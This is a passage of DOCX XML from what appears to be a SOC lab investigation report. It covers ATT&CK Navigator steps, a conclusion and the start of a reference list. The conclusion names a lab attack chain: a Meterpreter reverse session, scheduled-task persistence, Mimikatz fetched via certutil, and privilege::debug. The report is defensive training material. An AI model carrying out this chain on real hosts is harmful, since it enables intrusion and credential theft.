        </w:rPr>
        <w:t>Enterprise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain and contains the technique IDs mapped to the observed activities in this case. Before final presentation, analysts should verify that the technique names, identifiers, and ATT&amp;CK version are consistent with the current Navigator release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5966E4C7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="61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Open the MITRE ATT&amp;CK Navigator:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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"https://mitre-attack.github.io/attack-navigator/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://mitre-attack.github.io/attack-navigator/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346155F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="61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Select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Layer → Open Existing Layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and load the provided JSON layer file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA75B8">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="61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Ensure the layer is configured for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enterprise ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain and review the highlighted techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC4AA0D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="61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Add or verify layer comments referencing the supporting evidence, including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sysmon Events 1, 3, 11, 15, and 22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Security Events 4688, 4720, 4732, and 4698</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, and relevant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Splunk correlation results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1007E9">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="61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Use the completed Navigator layer and its screenshot as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>executive-level visual summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, while retaining the detailed evidence mappings and log analysis within this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294E2C0">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="610" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Technique mappings must be based on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>observed behavior and supporting telemetry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The presence or use of a particular tool alone should not be treated as sufficient evidence for assigning an ATT&amp;CK technique. Where the available evidence is incomplete, the layer comments should clearly identify the mapping as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conditional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reference the additional evidence required for confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450DE482">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6447790" cy="4265930"/>
            <wp:effectExtent l="0" t="0" r="1016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rcRect r="11991" b="12332"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6447790" cy="4265930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4DB58">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Figure 4. ATT&amp;CK coverage used in the case. Conditional techniques are deliberately separated from confirmed behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFA7BB">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D4DFA8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> / CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CFD65E">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Final Investigator Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CAAED">
      <w:pPr>
        <w:pStyle w:val="36"/>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updated lab represents a complete SOC investigation workflow. The activity begins with a Metasploit payload generated on Kali, followed by establishment of a reverse HTTP Meterpreter session on the Windows 10 endpoint. Subsequent activity includes host discovery, local account creation and privilege assignment, scheduled task creation under the SYSTEM context, transfer of Mimikatz using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, removal of the temporary account, and execution of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A02DB6">
      <w:pPr>
        <w:pStyle w:val="36"/>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Throughout the investigation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide endpoint-level telemetry, while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> centralizes and correlates the collected events. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sigma rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SPL searches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> support detection and investigation, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides the behavioral framework used to organize and map the observed activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2403D9">
      <w:pPr>
        <w:pStyle w:val="36"/>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The primary analytical lesson is to treat the console transcript as an initial evidence layer rather than as proof of every activity. Each behavior should be validated against endpoint telemetry by correlating </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sysmon ProcessGuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, Windows Security account and scheduled-task events, network destinations and ports, file and stream creation events, and exact command-line activity. This approach ensures that the final assessment clearly separates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>directly observed behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>supporting or expected telemetry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>activities that remain unconfirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4FC28B">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215DA96D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BDC156">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>References and Primary Sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A479C">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The following primary and authoritative sour</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ces support the ATT&amp;CK technique definitions, endpoint telemetry, detection logic, SIEM implementation, and ATT&amp;CK Navigator content used throughout this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773511F0">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1EC3B6">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Phishing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1566/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57145000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Spearphishing via Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1566/003/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71B660">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — User Execution: Malicious File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1204/002/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1476DE06">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Windows Command Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1059/003/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4043D885">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Web Protocols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1071/001/</w:t>
      </w:r>
    </w:p>
